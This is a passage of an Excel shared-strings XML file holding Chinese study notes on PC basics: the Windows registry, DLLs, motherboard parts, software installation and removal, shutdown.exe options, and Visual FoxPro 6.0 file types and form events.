    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表的操作：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>导入和导出；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>权限设置：注册表项右击---权限；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可以把常用的注册表项放置到收藏夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>users:包含current user:当前登录用户的用户信息；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Local Machine:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>others:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>current config:当前用户桌面配置信息；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>classes root：相当于Local machine\software\classes：文件类型；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HKEY:根键；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>KEY:键</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SUBKEY:子键；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sz:字符串；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Binary:二进制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dword:双字；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Value entry:值项，包括名称、数据类型、数据；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表键值：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表包含在windows目录下的两个文件systme.dat和user.dat里，还有它们的备份DAD文件，windows目录下的Regedit.exe程序可以存取注册表数据库；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>许多应用程序都使用TCP和UDP来传递数据，运输层在生成报文时，会在首部加一个应用程序标识，当运输层收到数据时，它会根据此标识把数据转发给相应的应用程序，这个应用程序标识就叫端口。客户端对它所使用的端口号并不关心，只要保证在本机上是唯一的就可以了，客户端口号又称之为临时端口号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网卡根据数据包包含的应用程序标识转发给不同的网络应用程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS:是用户对硬件设备进行最低级、最直接的硬件控制的一组专用程序：系统日期和时间，存储设备参数、软驱参数、设置处理错误方式，开启系统快速自检，引导启动各方崭露，开启病毒警告功能，设置CPU缓存，电源管理，集成外设设置，密码设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一个软件的所有功能，要以只在一个单独的EXE文件中实现。但这样的程序文件会很大，调用时不管它用得着用不着的功能全被加载到内在中，太浪费系统资源。而且只有一个程序文件，升级或改错也很麻烦，某个功能的修改，可能导致整个软件都要重新创建一次；
    微软解决这一问题的办法就是把大软件分成许多小的DLL模块文件，每个DLL各司其职，比如a.dll只负责显示窗口界面，b.dll只负责后台数据处理等，最后由一个很小的exe可执行程序统一调用；
是windows基石，通过系统和其它应用程序调用时发挥作用，将程序代码封闭成函数，被动态载入内存，可以扩展应用程序，便于升级，便于程序员合作，节省内存，解决应用程序本地化问题，有点类似于操作系统与驱动的分开设计，方便升级及共享程序资源；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 主板的组成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU插槽：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存插槽</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>总线扩展槽</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS芯片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>芯片组</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>外设接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电源插座</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMOS电池</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>控制指示接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>前置面板USB接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>前置音频接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>slot\socket939\LGA755;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DDR,DDR2;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISA,CNR,AMR,ACR,AGP,PCI,PCI-E;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS程序（系统启动，基本驱动）固化在ROM芯片中；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>北桥芯片，南桥芯片（总线之间的桥接器）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IDE,SATA,Fibre channel,USB,IEEE1394;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软、硬盘数据线接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PS/2键盘，鼠标，并口，串口，USB，IEEE1394,光纤，音频；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板24针或20针电源插座，CPU4针，光驱、硬盘D型4孔；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 分类</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按CPU插座：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按结构：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>按芯片组：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Slot,slcket,LGA;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AT,ATX,MicroATX,NLX:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 其它补充</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是否集成网卡、声卡、显卡；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NLX：将所有I\O接口、板卡和电源线接口全部集成在一块扩展槽上，此卡上有PCI等扩展槽和软硬盘接口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 光标置于第一页最后一个字符；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2 页面设置：方向：横向；预览：应用于：插入点之后；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 页面设置---版式---页面和页脚：奇偶页不同；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 视图---页眉和页脚，在第2页设置为空白；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果你对合并文档的先后顺序有要求，可以在文档前加序号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注a：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注b：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在“插入”菜单找不到“插入文件”的工具，可以“自定义快捷访问工具栏”（在office logo右旁），点击下拉箭头---其他命令---自定义---从下列位置选择命令：插入选项卡---插入文件---添加---确定，至此，快速访问工具栏中会出现插入文件的工具栏图标；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC基础知识点index</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件系统</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>服务</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>是一种在后台运行的应用程序类型,服务通常可以在本地和通过网络为用户提供一些功能,也就是说,服务只供OS调用,并在后台为OS提供各种功能的支持环境,而OS则负责将各种功能的操作权交给用户,服务可以在用户登录系统前后分别予以加载;
    每项服务都是一个具体的文件存在,对应的文件一般都存储在C:\windows\systme32或drives文件夹中,其扩展名一般是exe,sys,dll(被rundll32.exe或rundll.exe程序调用)
    服务可以独立存在,也可和其他服务紧密配合运行,关闭某个服务时,有时会影响到储存的组件和服务,它们之间的储存关系可以在某个服务的属性对话框中查看;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>自动备份暂存文件</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>:office每次打开一个文档都会在同目录下自动生成一个以~$开头的同名文件，是一个自动备份暂存文件（自动备份暂存时间间隔可设置），在文档运行时不可删除，当非正常关机后再重新开机打开word时，会在左侧提示你是否导入未保存的文档；即当打开一个word文档时，会自动打开一个副本，当编辑文档时，编辑的是副本，软件word正常关闭时，副本原文档，同时自身被删除，当word非正常关闭时，副本会保存在硬盘，所以有时会出现：“此文件正在编辑，只可打开副本”</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>映像文件</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>又称映像文件，它采用与信息源（硬盘或光盘）文件系统完全相同的存储格式，能够真实地反映信息源的数据内容，逻辑结构、文件格式等特征。常的文件格式主要有ISO，IMG/CCD/SWB,BIN,NRG,CDI,NCD,C2D,VCD FCD,MCD,TAO.主要用于将软件或系统文件打包成映像文件，记录成光碟后用于安装，或者用于数据备份，恢复，光盘复制等；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>文件如何打包</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：一是压缩，二是镜像ISO文件，包括分区镜像和文件镜像；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>文件系统</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：是一组程序，告诉操作系统如何访问及解释存储在磁盘、磁带、光盘驱动器或其他存储媒介上的内容，是驱动器所有数据之间的统一的关系、结构和组织；有磁盘文件系统：FAT,FAT32,NTFS;光盘文件系统：CDFS,UDF,ISO;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>WAP版与WWW版网页</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>为何差别这么大呢？WAP版是有所取舍的，省略掉了不必要的信息，视觉上难免不够丰富，WWW版花费的流量是相当大的，因为文字，图片都被下载取了手机端，看一会儿数兆的流量就商有了。WAP版就好很多，只包含比较重要的信息，过滤掉很多图片，非常省流量，所以速度也要快很多；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>斜杠/(下),与反斜杠\(上)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>DLL</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：dynamic link library动态链接库：</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>映像文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件如何打包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自动备份暂存文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WAP版与WWW版网页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>斜杠/(下),与反斜杠\(上)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>全角(圆月)与半角(半月)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DLL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Return to index</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SN</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Categories</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Title</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>summary</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 软件如何在windows安家？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.1 在硬件的某一位置创建一个专门的文件夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.2 将需要的文件从硬盘的另一位置（下载后存放位置）或光盘复制到上述文件夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.4 软件的设置参数与DLL文件的注册信息写进注册表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.3 拷贝和注册相关DLL文件到自己的安装目录或相关系统目录下；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.5 上述的大型软件由于涉及的文件、配置较多，一般会采用专业安装程序制作工具，这样的安装文件会有详细的选项，绿色软件则不需注册，可直接运行；（会让用户建立快捷方式）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    1.6 以上创建文件夹，复制文件，写入注册表等操作为避免用户的不便操作，程序开发人员会采用专业安装程序制作工具制作安装文件，由此也可以通过更改增加安装包的适当参数让程序安装自动完成，也可以利用第三方软件录制一次软件安装过程然而让软件以后安装时可以自动运行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 软件安装为什么要求重启？（DLL变量和注册表变更）：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 软件安装流程</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.1 了解其他用户对软件的评价及软件类型（免费、共享、或商业）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.3 设置系统还原点，特别是对是否与OS兼容没把握的程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.4 准备安装光盘或下载软件程序、补丁；ID或密钥或注册码等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.5 获得管理员帐户资格，安装时注意是否有相应的捆绑程序？位置考虑系统盘以外的其他位置，且尽量单任务运行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.2 软件运行所硬件和操作系统环境（与OS是否兼容？）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    4.6 快捷方式对应以上安装路径的exe执行文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 打开程序的方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    5.1 开始菜单、桌面或快速启动栏的快捷方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    5.2 安装路径的exe应用程序文件直接打开；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    5.3 相关联文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6 设置默认程序（当同类的文件有安装多个应用程序可以打开时）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    默认程序通过注册表与文件相关连，当文件不能打开时，就是因为关连错误或DLL失效或者就是电脑内无打开此类型的软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>7 软件卸载</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    当“某程序正在运行该程序”，可考虑进入安全模式再卸载，当卸载或更改程序列表中还有残留信息时，可在注册表中“uninstall"项展开的子项清单中DEL（Machine根目录下）；如在列表中找不到隐藏的软件，可以找到此软件的安装位置，在.inf文件中打开，找到包含“hide"的字段，删除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 安装文件类型：a 压缩包;b 软件包，如office；c .exe文件;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>9 补充：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>8 软件运行方式：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    8.1 解压后直接运行程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    8.2 解压后与文件关联，如Kmplayer,WinARA;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    8.3 解压后安装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    9.1 安装文件VS制作安装文件的工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    9.2 默认程序VS文件类型：扩展名（有文件特征码）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    9.3 windows内置应用程序：打开或关闭windows功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    9.4 程序安装后，会自动在users\username\Application Data生成一个文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    9.5 系统和几乎所有的软件都有配置文件（保存用户平时的使用习惯、参数），在安装软件时，把配置文件一起安装，很快就可以回到以前的操作习惯；配置保存类型：DAT和INI文件，注册表；以及application data;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件下载、安装、运行、卸载</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件下载、安装、运行、卸载</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　 shutdown.exe -c "消息内容"　 　　输入关机对话框中的消息内容(不能超127个字符)。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　 shutdown.exe -t时间　　　　　　 设置关机倒计时。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据库</t>
  </si>
  <si>
    <t>app</t>
  </si>
  <si>
    <t>生成的应用程序</t>
  </si>
  <si>
    <t>exe</t>
  </si>
  <si>
    <t>可执行程序</t>
  </si>
  <si>
    <t>pjx</t>
  </si>
  <si>
    <t>项目</t>
  </si>
  <si>
    <t>pjt</t>
  </si>
  <si>
    <t>项目备注</t>
  </si>
  <si>
    <t>dbc</t>
  </si>
  <si>
    <t>dct</t>
  </si>
  <si>
    <t>数据库备注</t>
  </si>
  <si>
    <t>dcx</t>
  </si>
  <si>
    <t>数据库索引</t>
  </si>
  <si>
    <t>dbf</t>
  </si>
  <si>
    <t>表</t>
  </si>
  <si>
    <t>fpt</t>
  </si>
  <si>
    <t>表备注</t>
  </si>
  <si>
    <t>复合索引</t>
  </si>
  <si>
    <t>idx</t>
  </si>
  <si>
    <t>单索引</t>
  </si>
  <si>
    <t>qpr</t>
  </si>
  <si>
    <t>生成的查询程序</t>
  </si>
  <si>
    <t>qpx</t>
  </si>
  <si>
    <t>编译后的查询程序</t>
  </si>
  <si>
    <t>scx</t>
  </si>
  <si>
    <t>表单</t>
  </si>
  <si>
    <t>sct</t>
  </si>
  <si>
    <t>表单备注</t>
  </si>
  <si>
    <t>cdx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>frx</t>
  </si>
  <si>
    <t>报表</t>
  </si>
  <si>
    <t>frt</t>
  </si>
  <si>
    <t>报表备注</t>
  </si>
  <si>
    <t>lbx</t>
  </si>
  <si>
    <t>标签</t>
  </si>
  <si>
    <t>lbt</t>
  </si>
  <si>
    <t>标签备注</t>
  </si>
  <si>
    <t>prg</t>
  </si>
  <si>
    <t>程序</t>
  </si>
  <si>
    <t>fxp</t>
  </si>
  <si>
    <t>编译后的程序</t>
  </si>
  <si>
    <t>err</t>
  </si>
  <si>
    <t>编译错误</t>
  </si>
  <si>
    <t>mnx</t>
  </si>
  <si>
    <t>菜单</t>
  </si>
  <si>
    <t>mnt</t>
  </si>
  <si>
    <t>菜单备注</t>
  </si>
  <si>
    <t>mpr</t>
  </si>
  <si>
    <t>生成的菜单程序</t>
  </si>
  <si>
    <t>mpx</t>
  </si>
  <si>
    <t>编译后的菜单程序</t>
  </si>
  <si>
    <t>vcx</t>
  </si>
  <si>
    <t>可视类库</t>
  </si>
  <si>
    <t>vct</t>
  </si>
  <si>
    <t>可视类库备注</t>
  </si>
  <si>
    <t>txt</t>
  </si>
  <si>
    <t>文本</t>
  </si>
  <si>
    <t>bak</t>
  </si>
  <si>
    <t>备份文件</t>
  </si>
  <si>
    <t>VFP 6.0文件类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩展名</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t/>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VFP 6.0文件类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">  表单(Form)是应用程序的用户界面，也是进行程序设计的基础。各种图形、图像、数据等都是通过表单或表单中的对象显示出来，因此表单是一个容器对象。</t>
  </si>
  <si>
    <t xml:space="preserve">   在FoxPro的早期版本中表单被称为屏幕(Screen)，在Visual Basic中则称为窗体。</t>
  </si>
  <si>
    <t>(1)表单的结构。</t>
  </si>
  <si>
    <t xml:space="preserve">    VFP的表单具有和Windows应用程序的窗口界面相同的结构特征。一个典型的表单有图标、标题、极小化按钮、极大化按钮、关闭按钮、移动栏、表单体及其周围的边框。其中除了表单体之外的所有特征都可以部分或全部从表单中被删除。</t>
  </si>
  <si>
    <t>(2)表单属性</t>
  </si>
  <si>
    <t xml:space="preserve">MinButton   用于控制表单的标题栏中是否有极小化按钮  </t>
  </si>
  <si>
    <t xml:space="preserve">WindowState 用于控制表单是极小化、极大化还是正常状态 </t>
  </si>
  <si>
    <t xml:space="preserve">WindowType 若表单是模式表单，则用户在访问windows屏幕中其他任何对象前必须关闭该表单 </t>
  </si>
  <si>
    <t>(3)表单的事件与方法。</t>
  </si>
  <si>
    <t xml:space="preserve">    就像属性那样，只有部分的表单事件与方法经常被使用，很多事件与方法很少被使用，除非你在编写一个非常复杂的应用程序。可以在代码窗口的“过程”下拉列表框中看到所有表单事件与方法的列表，也可以在“属性”窗口的“方法程序”选项卡中看到所有表单事件与方法的列表。</t>
  </si>
  <si>
    <t>下面只列举那些最常用的事件与方法。</t>
  </si>
  <si>
    <t>常用的表单事件：</t>
  </si>
  <si>
    <t xml:space="preserve">Load事件——当表单被装入内存时发生； </t>
  </si>
  <si>
    <t xml:space="preserve">Init事件——当表单被初始化时发生； </t>
  </si>
  <si>
    <t xml:space="preserve">Activate事件——当表单被激活时发生。 </t>
  </si>
  <si>
    <t>上述事件被激发的顺序为Load、Init、Activate。</t>
  </si>
  <si>
    <t xml:space="preserve">Destroy事件——当表单被释放时发生； </t>
  </si>
  <si>
    <t xml:space="preserve">Unload事件——当表单被关闭时发生。 </t>
  </si>
  <si>
    <t>上述事件被激发顺序为Unload、Destroy。</t>
  </si>
  <si>
    <t>Resize事件——当用户或程序去改变表单的大小时</t>
  </si>
  <si>
    <t xml:space="preserve">发生。 </t>
  </si>
  <si>
    <t>常用的表单方法：</t>
  </si>
  <si>
    <t xml:space="preserve">Hide方法——隐藏表单； </t>
  </si>
  <si>
    <t xml:space="preserve">Show方法——显示表单； </t>
  </si>
  <si>
    <t xml:space="preserve">Release方法——释放表单； </t>
  </si>
  <si>
    <t>Refresh方法——刷新表单。</t>
  </si>
  <si>
    <t>form</t>
  </si>
  <si>
    <t>form</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对象的属性、事件、方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">  对象(object)在现实生活中是很常见的，如：一个人是一个对象，一台PC机是一个对象。如果将一台PC机拆开来看便有“显示器、机箱、软盘驱动器、硬盘、键盘、鼠标器…”，每一个又都是一个对象，即PC机对象是由多个“子”对象组成的。此时PC机又称为一个包容器(Container)对象。在可视化编程中，对象是应用程序的基本元素，常见的对象有表单、文本框、列表框等。</t>
  </si>
  <si>
    <t xml:space="preserve">  从可视化编程的角度来看，对象是一个具有属性(数据)和方法(行为方式)的实体。一个对象建立以后，其操作就通过与该对象有关的属性、事件和方法来描述。</t>
  </si>
  <si>
    <t>1、对象的属性</t>
  </si>
  <si>
    <t xml:space="preserve">  属性(Propeny)是指对象的一项描述内容，用来描述对象的一个特性，不同的对象有不同的属性，而每个对象又都由若干属性来描述。在可视化编程中，常见的属性有标题(Caption)、名称(Name)、背景色(Backcolor)、字体大小(FontSize)、是否可见(Visible)等。通过修改或设置某些属性便能有效地控制对象的外观和操作。</t>
  </si>
  <si>
    <t>2．对象的事件</t>
  </si>
  <si>
    <t xml:space="preserve">    所谓事件(Event)，是由VFP预先定义好的、能够被对象识别的动作，如单击(Click)事件、双击(DblClick)事件、装入(Load)事件、移动鼠标(MouseMove)事件等，不同的对象能识别的事件不全相同。对象的事件是固定的，用户不能建立新的事件。为此，VFP提供了丰富的内部事件，这些事件足以应付Windows中的绝大部分操作需要。</t>
  </si>
  <si>
